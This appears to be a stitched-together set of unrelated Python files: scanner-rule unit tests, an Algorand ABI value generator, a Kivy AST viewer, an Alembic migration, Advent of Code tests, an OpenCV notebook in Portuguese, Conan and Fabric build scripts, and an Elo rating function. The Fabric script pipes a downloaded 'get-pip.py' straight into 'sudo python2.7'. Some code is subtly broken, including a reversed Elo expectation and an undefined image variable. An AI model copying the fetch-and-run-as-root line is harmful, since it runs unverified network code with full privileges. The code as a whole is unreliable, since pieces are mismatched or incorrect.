mapped") self.assertEqual("1", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc1", rule.description, "Description should be mapped") def test_rule_load_with_multiple_text_patterns_overrides_and_file_pattern(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: - "pattern1" - "pattern2": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } file_pattern: "*.file1" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("*.file1", rule.file_name, "File name should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") if rule.text_pattern == "pattern1": found1 = True self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found2 = True self.assertEqual("desc2", rule.description, "Description should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("2", rule.refactor_rating, "Refactor rating should be mapped") self.assertTrue(found1 and found2, "Should have found pattern1 and pattern2") def test_rule_load_with_text_pattern_overriding_files_overriding_rule(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: - "pattern1" - "pattern2": { description: "desc3", replatform_advice: "bap", refactor_rating: 3 } files: - "file1" - "file2": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(4, len(Scanner.rulebase)) found1and1 = False found1and2 = False found2and1 = False found2and2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") self.assertTrue(rule.file_name == "file1" or rule.file_name == "file2") if rule.file_name == "file1": if rule.text_pattern == "pattern1": found1and1 = True self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found1and2 = True self.assertEqual("desc3", rule.description, "Description should be mapped") self.assertEqual("bap", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("3", rule.refactor_rating, "Refactor rating should be mapped") elif rule.file_name == "file2": if rule.text_pattern == "pattern1": found2and1 = True self.assertEqual("desc2", rule.description, "Description should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("2", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found2and2 = True self.assertEqual("desc3", rule.description, "Description should be mapped") self.assertEqual("bap", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("3", rule.refactor_rating, "Refactor rating should be mapped") self.assertTrue(found1and1 and found1and2 and found2and1 and found2and2, "Should have found all 4 rule combos") def test_archive_scan_yaml(self): Scanner.load_yaml_rules(self.path_helper("rulebase.yml")) results_stats = Scanner.scan_archive(self.path_helper("SampleWebApp-master.zip")) self.assertEqual(97.44, results_stats.cloud_readiness_index) # Helps allow resources to be resolved if running via py.test or directly in IDE def path_helper(self, file_name): archive = os.path.join("ephemerol", "test", file_name) if not os.path.isfile(archive): archive = file_name return archive if __name__ == '__main__': unittest.main() graviton/abi_strategy.py1-10 """ Inspired by Hypothesis' Strategies. TODO: Leverage Hypothesis! """ from collections import OrderedDict import random import string from typing import Callable, Dict, List, Optional, Union, cast from algosdk import abi, encoding PY_TYPES = Union[bool, int, list, str, bytes] class ABIStrategy: DEFAULT_DYNAMIC_ARRAY_LENGTH = 3 STRING_CHARS = string.digits + string.ascii_letters + string.punctuation seeded_randomness: bool = False random_seed: int @classmethod def seed_randomness(cls, random_seed: int = 42): """ If you never call this function, there won't be a specific random seed. """ if cls.seeded_randomness: print(f"already seeded with seed {cls.random_seed}") return cls.random_seed = random_seed random.seed(cls.random_seed) cls.seeded_randomness = True def __init__(self, abi_instance: abi.ABIType, dynamic_length: Optional[int] = None): assert isinstance( abi_instance, abi.ABIType ), f"expected abi_type but got {abi_instance} of type {type(abi_instance)}" assert dynamic_length is None or isinstance( dynamic_length, int ), f"expected dynamic_length to be an int but was given {type(dynamic_length)}" self.abi_type: abi.ABIType = abi_instance self.dynamic_length: Optional[int] = dynamic_length def get_random(self) -> Union[bool, int, list, str, bytes]: if isinstance(self.abi_type, abi.UfixedType): raise NotImplementedError( f"Currently cannot get a random sample for {self.abi_type}" ) if isinstance(self.abi_type, abi.BoolType): return random.choice([True, False]) if isinstance(self.abi_type, abi.UintType): return random.randint(0, (1 << self.abi_type.bit_size) - 1) if isinstance(self.abi_type, abi.ByteType): return ABIStrategy(abi.UintType(8)).get_random() if isinstance(self.abi_type, abi.TupleType): return [ ABIStrategy(child_type).get_random() for child_type in self.abi_type.child_types ] if isinstance(self.abi_type, abi.ArrayStaticType): return [ ABIStrategy(self.abi_type.child_type).get_random() for _ in range(self.abi_type.static_length) ] if isinstance(self.abi_type, abi.AddressType): return encoding.encode_address( bytearray( cast( List[int], ABIStrategy( abi.ArrayStaticType( abi.ByteType(), self.abi_type.byte_len() ) ).get_random(), ) ) ) dynamic_range = range( self.DEFAULT_DYNAMIC_ARRAY_LENGTH if self.dynamic_length is None else self.dynamic_length ) if isinstance(self.abi_type, abi.ArrayDynamicType): return [ ABIStrategy(self.abi_type.child_type).get_random() for _ in dynamic_range ] if isinstance(self.abi_type, abi.StringType): return "".join(random.choice(self.STRING_CHARS) for _ in dynamic_range) raise ValueError(f"Unexpected abi_type {self.abi_type}") def map( self, waterfall: Dict[abi.ABIType, Callable[..., PY_TYPES]], *args, **kwargs, ) -> PY_TYPES: for abi_type, call in waterfall.items(): if isinstance(self.abi_type, abi_type): return call(*args, **kwargs) return waterfall["DEFAULT"](*args, **kwargs) def mutate_for_roundtrip(self, py_abi_instance: PY_TYPES) -> PY_TYPES: def not_implemented(_): raise NotImplementedError(f"Currently cannot handle type {self.abi_type}") def unexpected_type(_): raise ValueError(f"Unexpected abi_type {self.abi_type}") def address_logic(x): y = encoding.decode_address(x) return encoding.encode_address( bytearray( ABIStrategy( abi.ArrayStaticType(abi.ByteType(), len(y)) ).mutate_for_roundtrip(y) ) ) waterfall = OrderedDict( [ (abi.UfixedType, not_implemented), (abi.BoolType, lambda x: not x), (abi.UintType, lambda x: (1 << self.abi_type.bit_size) - 1 - x), ( abi.ByteType, lambda x: ABIStrategy(abi.UintType(8)).mutate_for_roundtrip(x), ), ( abi.TupleType, lambda x: [ ABIStrategy(child_type).mutate_for_roundtrip(x[i]) for i, child_type in enumerate(self.abi_type.child_types) ], ), ( abi.ArrayStaticType, lambda x: [ ABIStrategy(self.abi_type.child_type).mutate_for_roundtrip(y) for y in x ], ), (abi.AddressType, address_logic), ( abi.ArrayDynamicType, lambda x: [ ABIStrategy(self.abi_type.child_type).mutate_for_roundtrip(y) for y in x ], ), (abi.StringType, lambda x: "".join(reversed(x))), ("DEFAULT", unexpected_type), ] ) return self.map(waterfall, py_abi_instance) # encoding: utf-8 # (c) 2017-2021 Open Risk (https://www.openriskmanagement.com) # # concentrationMetrics is licensed under the Apache 2.0 license a copy of which is included # in the source distribution of concentrationMetrics. This is notwithstanding any licenses of # third-party software included in this distribution. You may not use this file except in # compliance with the License. # # Unless required by applicable law or agreed to in writing, software distributed under # the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific language governing permissions and # limitations under the License. from codecs import open from setuptools import setup __version__ = '0.5.1' ver = __version__ setup( name='concentrationMetrics', version=ver, packages=['concentrationMetrics', 'datasets', 'examples.python'], url='https://github.com/open-risk/concentrationMetrics', download_url='https://github.com/open-risk/concentrationMetrics/archive/v_0.5.0.tar.gz', license='The MIT License (MIT)', author='Open Risk', author_email='', description='A python library for the computation of various concentration, inequality and diversity indices', install_requires=[ 'numpy', 'pandas', 'scipy', 'networkx', 'pytest' ], include_package_data=True, zip_safe=False, provides=['concentrationMetrics'], keywords=['concentration', 'diversity', 'inequality', 'index'], classifiers=[ 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'Intended Audience :: Financial and Insurance Industry', 'Development Status :: 3 - Alpha', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3 :: Only', 'Programming Language :: Python :: 3.6', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: Information Analysis' ] ) 0 YEAR_TO_MINUTES = 60 * 24 * 365 MONTH_TO_MINUTES = 60 * 24 * 30 import sys from time import time import kivy from kivy.clock import Clock kivy.require('1.8.1') from kivy.app import App from kivy.lang import Builder from kivy.uix.treeview import TreeViewLabel from kivy.properties import StringProperty, ObjectProperty from kivy.logger import Logger from kvlang.observer import ASTObserver root_kv = ''' : markup: True text: '%s [color=666666][%s][/color]' % (self.rule_text, self.rule_type) BoxLayout: orientation: 'vertical' Label: size_hint_y: None height: '24sp' text: 'AST for {}' BoxLayout: size_hint_y: None height: '24sp' canvas.before: Color: rgba: 0.3, 0.3, 0.3, 1 Rectangle: pos: self.pos size: self.size FloatLayout: Label: text: 'Source' size_hint: 1, 1 pos: self.parent.pos ToggleButton: id: source_edit text: 'Edit' size_hint: None, None width: self.texture_size and (self.texture_size[0] + 24) height: self.parent.height - 8 y: self.parent.y + 4 x: self.parent.x + 8 Label: text: 'AST' Label: text: 'Output' BoxLayout: ScrollView: id: sv_source_text TextInput: id: source_text size_hint_y: None height: max(self.minimum_height, sv_source_text.height) readonly: source_edit.state == 'normal' BoxLayout: orientation: 'vertical' BoxLayout: orientation: 'horizontal' size_hint_y: None height: sp(64) Button: id: btn_moveup text: '^' Button: id: btn_movedown text: 'v' Button: id: btn_addprop text: '+' Button: id: btn_removenode text: '-' ScrollView: TreeView: id: treeview hide_root: True height: self.minimum_height size_hint_y: None ScrollView: id: sv_output_text TextInput: id: output_text size_hint_y: None height: max(self.minimum_height, sv_output_text.height) readonly: True ''' class AstNode(TreeViewLabel): rule_text = StringProperty() rule_type = StringProperty() tree_node = ObjectProperty() def cleartreeview(tree_view): nodes = list(tree_view.iterate_all_nodes()) for node in nodes: tree_view.remove_node(node) def buildtreeview(tree, tree_view): start_time = time() parent = None cleartreeview(tree_view) populatetreeview(tree_view, parent, tree, True) finish_time = time() Logger.debug('kvAst: tree built in %0.4fs' % (finish_time - start_time)) def populatetreeview(tree_view, parent, tree, is_open=False): tree_node = parent if not tree.isNil(): rule_type = type(tree).__name__ if rule_type.endswith('Node'): rule_type = rule_type[:-4] tree_node = tree_view.add_node(AstNode(rule_text=str(tree), rule_type=rule_type, tree_node=tree, is_open=is_open), parent) for child in tree.getChildren(): populatetreeview(tree_view, tree_node, child, is_open=is_open) class AstApp(App): def __init__(self, filename): super(AstApp, self).__init__() self.ast_file = filename self.ast = ASTObserver() self.selected = None def build(self): root = Builder.load_string(root_kv.format(self.ast_file)) st = root.ids.source_text self.ast.bind(source=st.setter('text')) st.bind(text=self.ast.setter('source')) self.ast.bind(on_generate=lambda _, tree: buildtreeview(tree, root.ids.treeview)) self.ast.bind(on_generate=lambda *_: setattr(self, 'output', self.ast.compile())) self.ast.bind(on_compile=lambda _, output: setattr(root.ids.output_text, 'text', output)) self.ast.bind(on_compile=self.save_outfile) self.ast.bind(on_tree_changed=self.refresh) Clock.schedule_once(self.load) root.ids.treeview.bind(selected_node=self.update_selection) root.ids.btn_movedown.bind(on_press=lambda *_: self.move_node(1)) root.ids.btn_moveup.bind(on_press=lambda *_: self.move_node(-1)) root.ids.btn_addprop.bind(on_press=self.add_property) root.ids.btn_removenode.bind(on_press=self.remove_node) return root def refresh(self, *_): self.selected = None buildtreeview(self.ast.tree, self.root.ids.treeview) self.ast.compile() def move_node(self, dir): if self.selected: tree = self.selected.tree_node if tree.parent: parent = tree.parent count = parent.getChildCount() if count > 1: index = tree.childIndex destindex = index + dir if destindex < 0: destindex = count - 1 elif destindex >= count: destindex = 0 self.ast.shift_node(tree, destindex) def add_property(self, *_): if self.selected: try: key = 'prop' value = "'val'" self.ast.widget_add_property(self.selected.tree_node, key, value) except ValueError, e: print str(e) def remove_node(self, *_): if self.selected: self.ast.remove_node(self.selected.tree_node) def load(self, _dt): self.ast.load(filename=self.ast_file) def save_outfile(self, ast, output): ast.unbind(on_compile=self.save_outfile) with open(self.ast_file + '.out', 'w') as f: f.write(output) def update_scroll(self, sv, ti): srow, scol = ti.get_cursor_from_index(ti.selection_from) ti.cursor = srow, scol spos = (ti.cursor_pos[0], ti.cursor_pos[1] - sv.height) x, y = sv.convert_distance_to_scroll(*spos) sv.scroll_y = min(1., max(0., y)) sv.update_from_scroll() def update_selection(self, _, selection): if selection: assert isinstance(selection, AstNode) self.selected = selection node = selection.tree_node textrange = node.get_textrange() if textrange: st = self.root.ids.source_text st.select_text(*textrange) self.update_scroll(self.root.ids.sv_source_text, st) try: ot = self.root.ids.output_text ot.select_text(node.output_start, node.output_stop) self.update_scroll(self.root.ids.sv_output_text, ot) except Exception: pass if __name__ == '__main__': AstApp(sys.argv[1]).run() dataactcore/migrations/versions/2592f3bdae72_adding_cascade_to_foreign_keys_in_.py """Adding cascade to foreign keys in RuleSetting Revision ID: 2592f3bdae72 Revises: 42e11ab5cea3 Create Date: 2020-02-11 17:02:00.651727 """ # revision identifiers, used by Alembic. revision = '' down_revision = '42e11ab5cea3' branch_labels = None depends_on = None from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql def upgrade(engine_name): globals()["upgrade_%s" % engine_name]() def downgrade(engine_name): globals()["downgrade_%s" % engine_name]() def upgrade_data_broker(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint('fk_rule', 'rule_settings', type_='foreignkey') op.drop_constraint('fk_impact', 'rule_settings', type_='foreignkey') op.create_foreign_key('fk_impact', 'rule_settings', 'rule_impact', ['impact_id'], ['rule_impact_id'], ondelete='CASCADE') op.create_foreign_key('fk_rule', 'rule_settings', 'rule_sql', ['rule_id'], ['rule_sql_id'], ondelete='CASCADE') # ### end Alembic commands ### def downgrade_data_broker(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint('fk_rule', 'rule_settings', type_='foreignkey') op.drop_constraint('fk_impact', 'rule_settings', type_='foreignkey') op.create_foreign_key('fk_impact', 'rule_settings', 'rule_impact', ['impact_id'], ['rule_impact_id']) op.create_foreign_key('fk_rule', 'rule_settings', 'rule_sql', ['rule_id'], ['rule_sql_id']) # ### end Alembic commands ### NelliaS/advent_of_code from pytest import mark from day_9 import ( parse, determine_adjacent_positions, main, determine_lowest_points, is_lowest, count_basin, ) test_area = [ [2, 1, 9, 9, 9, 4, 3, 2, 1, 0], [3, 9, 8, 7, 8, 9, 4, 9, 2, 1], [9, 8, 5, 6, 7, 8, 9, 8, 9, 2], [8, 7, 6, 7, 8, 9, 6, 7, 8, 9], [9, 8, 9, 9, 9, 6, 5, 6, 7, 8], ] def test_parse() -> None: assert parse("day_9_test.txt") == test_area @mark.parametrize( ["position_of_number", "height", "width", "adjacent_positions"], [ ([4, 9], 5, 10, [[3, 9], [4, 8]]), ([0, 3], 5, 10, [[1, 3], [0, 4], [0, 2]]), ], ) def test_determine_adjacent_positions( position_of_number, height, width, adjacent_positions ) -> None: assert ( determine_adjacent_positions(position_of_number, height, width) == adjacent_positions ) @mark.parametrize( ["number", "area_width", "area_height", "position_of_number", "result"], [ (5, 5, 10, [2, 2], True), (2, 5, 10, [0, 0], False), (9, 5, 10, [1, 1], False), (5, 5, 10, [4, 6], True), ], ) def test_is_lowest(number, area_width, area_height, position_of_number, result) -> None: assert ( is_lowest(number, test_area, area_width, area_height, position_of_number) == result ) def test_determine_lowest_points() -> None: assert determine_lowest_points(test_area) == ( [1, 0, 5, 5], [[0, 1], [0, 9], [2, 2], [4, 6]], ) @mark.parametrize( ["position_of_number", "area_height", "area_width", "result"], [ ([0, 1], 5, 10, 3), ([4, 6], 5, 10, 9), ], ) def test_count_basin(position_of_number, area_height, area_width, result) -> None: assert count_basin(test_area, position_of_number, area_height, area_width) == result def test_main() -> None: assert main("day_9_test.txt") == (15, 1134) hawkhai/pyinstaller """ pkg.relimport """ class Error(Exception): """Base class for exceptions in this module.""" pass class MovementError(Error): """Exception for invalid movement on the game board""" pass # coding: utf-8 # # Introdução # As transformações aplicadas em imagens cujo os objetivos são mudanças nas características espaciais chamam-se: transformações geométricas. Tais mudanças baseiam-se na multiplicação ponto a ponto das coordenadas da imagem por uma matriz de transformação. É importante ressaltar queas mudanças detém-se ao espaço vetorial da imagem ($x,y$), as informações de intensidade luminosa contida nos pixels não são alteradas. # # Exemplos destas transformações são: translação ($T1$), rotação ($T2$) e mudança de escala ($T3$). Representadas pelas seguintes matrizes de transformação: # $$ T1 = \left[ \begin{array}{ccc} # 1 & 0 & tx \\ # 0 & 1 & ty \end{array} \right]\ $$ # $$ T2 = \left[ \begin{array}{ccc} # cos\theta & -sin\theta \\ # sin\theta & cos\theta \end{array} \right]\ $$ # $$ T3 = \left[ \begin{array}{ccc} # cx & 0 & 0 \\ # 0 & cy & 0 \\ # 0 & 0 & 0 \end{array} \right]\ $$ # # Discussões sobre os métodos: # As transformações geométricas são operação elementares, porém úteis quando há necessário realizar mudanças no espaço de entrada a imagem, modificando a forma atual da imagem, seja por uma translação, rotação ou mudança de escala, por exemplo. # In[18]: import cv2 import numpy as np import matplotlib.pyplot as plt # - Abrir imagem: # In[21]: img = np.array(cv2.imread('apple-18.png', cv2.IMREAD_GRAYSCALE)) rows, cols = img.shape plt.figure(1) plt.imshow(img, 'gray') plt.axis('OFF') plt.title('Imagem Original') plt.show() # ## Translação # - Criar matriz de transformação: # In[30]: tx = 20 ty = 20 Mt = np.float32([[1, 0, tx], [0, 1, ty]]) imgT1 = cv2.warpAffine(img, Mt, (cols, rows)) tx = 20*2 ty = 20*2 Mt = np.float32([[1, 0, tx], [0, 1, ty]]) imgT2 = cv2.warpAffine(img, Mt, (cols, rows)) tx = 20*3 ty = 20*3 Mt = np.float32([[1, 0, tx], [0, 1, ty]]) imgT3 = cv2.warpAffine(img, Mt, (cols, rows)) # In[34]: plt.figure(2, figsize=(10,8)) plt.subplot(131) plt.imshow(imgT1, 'gray') plt.axis('OFF') plt.subplot(132) plt.imshow(imgT2, 'gray') plt.axis('OFF') plt.subplot(133) plt.imshow(imgT3, 'gray') plt.axis('OFF') plt.show() # A operação de translação move a imagem, desde um ponto de escolha (neste caso a origem) até um ponto de destino. É uma operação útil quando há interesse em remover parte da imagem e tornar útil apenas o resultado da translação. # # O método preserva o tamanho original da imagem e por tal motivo a operação em imagens binárias preserva o objeto e constitui um novo fundo. # ## Rotação # - Define centro de rotação, angulo de rotação e cria matriz de transformação # In[27]: cr = (cols/2, rows/2) ar = 90 Mr = cv2.getRotationMatrix2D(cr,ar,1) imgR1 = cv2.warpAffine(img, Mr, (cols,rows)) ar = -90 Mr = cv2.getRotationMatrix2D(cr,ar,1) imgR2 = cv2.warpAffine(img, Mr, (cols,rows)) ar = 35+10 Mr = cv2.getRotationMatrix2D(cr,ar,1) imgR3 = cv2.warpAffine(img, Mr, (cols,rows)) # In[29]: plt.figure(3, figsize=(10,8)) plt.subplot(131) plt.imshow(imgR1, 'gray') plt.axis('OFF') plt.subplot(132) plt.imshow(imgR2, 'gray') plt.axis('OFF') plt.subplot(133) plt.imshow(imgR3, 'gray') plt.axis('OFF') plt.show() # Assim como a translação a rotação move a imagem em torno de um ponto de escolha. A rotação pode utilizada livremente, ser no sentido horário ou antihorário e com a inclinação desejada. O tamanho e o fundo original da imagem são preservados e há movimento apenas do objeto. # ## Escala # In[60]: colNewsize = 100 rowNewsize = 100 imgE1 = cv2.resize(img, (colNewsize,rowNewsize)) colNewsize = 300 rowNewsize = 300 imgE2 = cv2.resize(img, (colNewsize,rowNewsize)) # In[61]: plt.figure(3+1, figsize=(10,8)) plt.subplot(131) plt.imshow(img, 'gray') plt.title('Imagem original %dx%d' % (img.shape[0], img.shape[1])) plt.axis('OFF') plt.subplot(132) plt.imshow(imgE1, 'gray') plt.title('Imagem reduzida %dx%d' % (imgE1.shape[0], imgE1.shape[1])) plt.axis('OFF') plt.subplot(133) plt.imshow(imgE2, 'gray') plt.title('Imagem aumentada %dx%d' % (imgE2.shape[0], imgE2.shape[1])) plt.axis('OFF') plt.show() # O método de mudança de escala trabalha de forma diferente das duas operações geométricas anteriores: O objeto e fundo são mantidos estáticos, enquanto que o tamanho da imagem é alterado. # # A baixa de qualidade na imagem reduzida dar-se perda de informações durante a redução de tamanho, que é notável ao visualizar ao a imagem representada do mesmo tamanho da original. Na imagem aumentada, também há perda de qualidade, porém menos notáveis ao representa-la do tamanho da original. # # Contudo, ao representar comparando a visualização da imagem aumentada e da imagem original, para o mesmo tamanho houve uma ligeira perda de qualidade. Nota-se que a imagem aumentada sofre menos os efeitos de baixa qualidade, por tender a preservar as informações originais. # In[68]: plt.figure(5, figsize=(7,7)) plt.imshow(imgE5, 'gray') plt.title('Imagem %dx%d' % (imgE2.shape[0], imgE2.shape[1])) plt.axis('OFF') plt.show() plt.figure(6, figsize=(7,7)) plt.imshow(img, 'gray') plt.title('Imagem %dx%d' % (img.shape[0], img.shape[1])) plt.axis('OFF') plt.show() # # Conclusões: # As operações geométricas de translação, rotação e mudança de escala sou elementares, porém podem ser úteis de acordo com a necessidade. Deve-se levar em conta as característica inerentes ao métodos, com o intuito de retirar maiores resultados destas opeações. vladimirshkoda/redis-bindings import pytest import redis REDIS_TEST_KEY_NAME = 'redis_key_name' VAL_1 = 'VAL_1' VAL_2 = 'VAL_2' VAL_3 = 'VAL_3' @pytest.fixture() def r(): """Redis client.""" client = redis.Redis(host='localhost', port=6379, db=9) client.flushdb() yield client client.flushdb() client.connection_pool.disconnect() tdiprima/code # decisionmaker.py # FB - 201010155 # Choose the best item from N options. # Each item can have M constraints (non-zero). # All constraints assumed to have equal importance (weight). import sys def makeDecision(constraintsTable, constraintTypes): # calculate item values itemValues = [] for i in range(n): itemValues.append(float(1)) for j in range(m): if constraintTypes[j] == 0: # min value is better itemValues[i] /= constraintsTable[i][j] else: # max value is better itemValues[i] *= constraintsTable[i][j] # choose the best item maxIndex = 0 maxValue = itemValues[0] for i in range(n): if itemValues[i] > maxValue: maxValue = itemValues[i] maxIndex = i return itemNames[maxIndex] # MAIN n = int(raw_input('Number of items: ')) if n < 2: sys.exit() m = int(raw_input('Number of constraints for each item: ')) if m < 2: sys.exit() constraintNames = [] constraintTypes = [] # min or max is better for j in range(m): constraintName = raw_input('Constraint ' + str(j + 1) + ' name: ') constraintNames.append(constraintName) constraintType = int(raw_input('Lower(0) or Higher(1) is better: ')) if constraintType < 0 or constraintType > 1: sys.exit() constraintTypes.append(constraintType) itemNames = [] constraintsTable = [] for i in range(n): itemName = raw_input('Item ' + str(i + 1) + ' name: ') itemNames.append(itemName) constraints = [] for j in range(m): constraint = float(raw_input(constraintNames[j] + ': ')) if constraint == 0.0: print 'Constraint value cannot be 0!' sys.exit() constraints.append(constraint) constraintsTable.append(constraints) print 'Best item decided: ' + makeDecision(constraintsTable, constraintTypes) from conans import ConanFile, CMake, tools class ArrowConan(ConanFile): name = "arrow" version = "0.15.1" license = "Apache-2.0" url = "https://arrow.apache.org/" description = "Apache arrow" topics = ("apache", "arrow") settings = "os", "compiler", "build_type", "arch" options = {"shared": [True, False]} default_options = "shared=False" generators = "cmake" requires="boost/1.71.0@conan/stable" def source(self): if self.settings.os == "Linux": self.run("sudo apt update && sudo apt install -y flex bison") self.run("git clone https://github.com/apache/arrow.git") self.run("cd arrow && git checkout apache-arrow-" + ArrowConan.version) tools.replace_in_file("arrow/cpp/CMakeLists.txt", 'project(arrow VERSION "${ARROW_BASE_VERSION}")', '''project(arrow VERSION "${ARROW_BASE_VERSION}") include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake) conan_basic_setup()''') tools.replace_in_file("arrow/cpp/cmake_modules/SetupCxxFlags.cmake", 'set(CXX_COMMON_FLAGS "${CXX_COMMON_FLAGS} -Wall -Wextra -Wdocumentation', 'set(CXX_COMMON_FLAGS "${CXX_COMMON_FLAGS} -Wall -Wextra') def configure_cmake(self): generator = "Ninja" if self.settings.os == "Windows" else None cmake = CMake(self, generator=generator) cmake.vebose = True cmake.definitions["ARROW_JEMALLOC"]="OFF" cmake.definitions["ARROW_BUILD_STATIC"]="ON" if self.settings.os == "Linux": cmake.definitions["ARROW_PARQUET"]="ON" cmake.definitions["ARROW_BUILD_SHARED"]="OFF" cmake.definitions["ARROW_BUILD_TESTS"]="OFF" cmake.definitions["ARROW_BOOST_USE_SHARED"]="OFF" cmake.definitions["ARROW_COMPUTE"]="OFF" cmake.definitions["ARROW_IPC"]="OFF" cmake.definitions["ARROW_HDFS"]="OFF" cmake.definitions["ARROW_BUILD_UTILITIES"]="OFF" cmake.definitions["ARROW_WITH_BROTLI"]="OFF" cmake.definitions["ARROW_WITH_LZ4"]="OFF" cmake.definitions["ARROW_WITH_SNAPPY"]="OFF" cmake.definitions["ARROW_WITH_ZLIB"]="OFF" cmake.definitions["ARROW_WITH_ZSTD"]="OFF" cmake.definitions["ARROW_USE_GLOG"]="OFF" if self.settings.os == "Windows": cmake.definitions["CMAKE_BUILD_TYPE"]=str(self.settings.build_type) cmake.configure(source_folder="arrow/cpp") return cmake def build(self): self.configure_cmake().build() def package(self): self.configure_cmake().install() def package_info(self): if self.settings.os == "Windows": self.cpp_info.libs = ["arrow_static"] else: self.cpp_info.libs = ["arrow"] from fabric.api import * from fabric.context_managers import * from fabric.contrib import * from fabric.operations import * from fabric.contrib.files import * import os, datetime, time, sys, shutil, errno def install_packages(): sudo("aptitude update") sudo("aptitude -y install python-dev git nodejs npm") sudo("npm install -g bower") sudo("ln -s /usr/bin/nodejs /usr/bin/node") run("curl --silent --show-error --retry 5 https://bootstrap.pypa.io/get-pip.py | sudo python2.7") sudo("pip install virtualenv") def create_virtualenv(): # Create virtual environment with cd("/home/vagrant/"): run("virtualenv cascadedemo") # Download the Django-Cascade examples from GitHub run("git clone -b 0.4.0 https://github.com/jrief/djangocms-cascade.git") # Place custom "manage.py" file into the /home/vagrant/djangocms-cascade/example/ directory put(os.getcwd() + '/manage.py', '/home/vagrant/djangocms-cascade/examples/') put(os.getcwd() + '/requirements.txt', '/home/vagrant/djangocms-cascade/examples/bs3demo/') with cd("/home/vagrant/djangocms-cascade/"): # Install bootstrap into the /home/vagrant/djangocms-cascade/bower_components/ directory run("source /home/vagrant/cascadedemo/bin/activate && bower install bootstrap --config.interactive=false") with cd("/home/vagrant/djangocms-cascade/examples"): # Install depending Python applications run("source /home/vagrant/cascadedemo/bin/activate && pip install -r bs3demo/requirements.txt") # Djangcms-Cascade 0.4.0 is not yet available in the Python Package Index and therefore it's installed directly from GitHub run("source /home/vagrant/cascadedemo/bin/activate && pip install git+https://github.com/jrief/djangocms-cascade.git@0.4.0") run("source /home/vagrant/cascadedemo/bin/activate && python manage.py syncdb") def main(): start_time = time.time() install_packages() create_virtualenv() print "This programme executed in %s seconds." % (time.time() - start_time) wantsomechocolate/WantsomeBeanstalk # Internationalization Settings: # Do not "force" a lang anymore: T.current_languages=['en', 'en-en', 'en-us'] # If I see you pass URL?lang=es-mx, then set the preferences in the session # Helper function to tell us what language we're using: def get_lang(): return session.lang_use or '' # English is the default allowed_languages = ['es-mx', 'de-de'] # TODO: Grab this from the DB if request.vars.lang and request.vars.lang in allowed_languages: session.lang_use = request.vars.lang else: if request.vars.has_key('lang') and request.vars.get('lang', '') == '' and session.has_key('lang_use'): del session['lang_use'] if session.lang_use: T.force(session.lang_use) ##################################################################################### # MIT License # # # # Copyright (C) 2019 # # # # This file is part of Yet-Another-AlphaZero. # # # # Permission is hereby granted, free of charge, to any person obtaining a copy # # of this software and associated documentation files (the "Software"), to deal # # in the Software without restriction, including without limitation the rights # # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # # copies of the Software, and to permit persons to whom the Software is # # furnished to do so, subject to the following conditions: # # # # The above copyright notice and this permission notice shall be included in all # # copies or substantial portions of the Software. # # # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # # SOFTWARE. # ##################################################################################### import math def calculate_elo(rating1, rating2, result, k_factor=40): expectation = (1.0 / (1.0 + pow(10, ((rating1 - rating2) / 400)))) return round(rating1 + k_factor * (result - expectation), 2) def update_elo_score(white_elo, black_elo, winner): if winner == 'white': new_white_elo = calculate_elo(white_elo, black_elo, 1) new_black_elo = calculate_elo(black_elo, white_elo, 0) elif winner == 'black': new_white_elo = calculate_elo(white_elo, black_elo, 0) new_black_elo = calculate_elo(black_elo, white_elo, 1) else: new_white_elo = calculate_elo(white_elo, black_elo, 0.5) 